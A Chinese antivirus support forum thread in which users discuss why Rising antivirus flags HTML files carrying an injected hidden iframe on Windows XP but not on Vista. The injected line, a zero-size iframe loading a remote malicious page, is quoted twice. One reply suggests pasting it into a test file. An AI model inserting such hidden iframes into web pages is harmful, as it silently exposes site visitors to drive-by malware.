瑞星卡卡安全论坛

瑞星2010版，已升级到最新版，分别在两台电脑上安装（不同序列号），一台是Vista（正版，笔记本自带），一台是WinXP，检查了瑞星的设置，对照看都一样，皆为管理员登录、专业模式、手动查杀设置的最高级。
有个目录下的html文件多个，HTML代码里都被加了iframe挂马，在Vista那台机器上手工查杀没有病毒，在WinXP那台电脑上检测出未知病毒并去掉了iframe里的挂马网站地址。
为啥Vista那边查不出来“病毒”呢？
-----------------------------
补充说明，是同样的、确认有挂马的iframe的HTML文件，分别拷在Vista和XP下。



用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)

<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
------------------------------
挂马HTML如上，WinXP上的瑞星将其报为病毒并去掉了其中的地址，改为
<IFRAME  WIDTH=0 HEIGHT=0></IFRAME>
而Vista上的瑞星视而不见，认为没“病毒”。

这跟设置没关系， vista那电脑没毒。
杀毒是检测文件内容的特征码，xp下被挂马了，vista下没被挂马。

应该是由于操作系统的原因照成的，XP是32位的，VISTA是64位的。

3楼说的应该是对的。

这跟设置没关系， vista那电脑没毒。
杀毒是检测文件内容的特征码，xp下被挂马了，vista下没被挂马。
-------------------
同样的被挂马的文件，不是“xp下被挂马了，vista下没被挂马”

应该是由于操作系统的原因照成的，XP是32位的，VISTA是64位的。
------------
我这个vista也是32位的

杀毒是检测文件内容的特征码，xp下被挂马了，vista下没被挂马。
-------------------

不知是特征码吧，还有内存查杀的，这就奇怪了？

oh，HTML文件。。。汗，你试试打开下不就知道了么。。。

我无语。。。

lz是如何判断vista哪台电脑是否中毒，如确认vista电脑和xp电脑都中毒，请查看vista电脑上的html文件是否和xp电脑上的一样，被写入恶意链接地址。

lz是如何判断vista哪台电脑是否中毒，如确认vista电脑和xp电脑都中毒，请查看vista电脑上的html文件是否和xp电脑上的一样，被写入恶意链接地址
--------------------------------------------
肯定是这样判断了我才来发贴的啥

再明确一下，同样的HTML文件，多个，里面都被写入了挂马的iframe，复制到vista和xp下（今天又试了在win2003里），在vista里没有查出来这几个文件被挂马，而xp和win2003里就查出来了，都是一样最新版的瑞星

不知是特征码吧，还有内存查杀的，这就奇怪了？

oh，HTML文件。。。汗，你试试打开下不就知道了么。。。

我无语。。。
---------------------------------
就是打开看了才知道的啥，不然我咋知道vista下瑞星没有查出来毒呢？

自己顶一下，等瑞星升级

发个vista下查杀不报的截图，和xp下查杀同一文件报毒的截图，还有把文件也一并打包发送上来。
ps：病毒库的版本都一样吧？

详细的操作系统类型，瑞星杀毒软件版本。

该用户帖子内容已被屏蔽

很简单，你可以自己建一个HTML文件，或者网上随便找一个网页保存下来，然后用文本编辑器打开，增加一行
<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
然后用瑞星看能否杀毒啥～～～
如果能杀，瑞星会把这行改为
<IFRAME WIDTH=0 HEIGHT=0></IFRAME>
并且报有病毒

如果http://rrr.rfhwfhw.com/1.htm这个链接地址是恶意的，瑞星杀毒软件肯定会报毒呀，并会清除掉这个链接地址呀。需要提供相关文件来分析，为什么vista下不报毒，而xp下报毒并可以清除。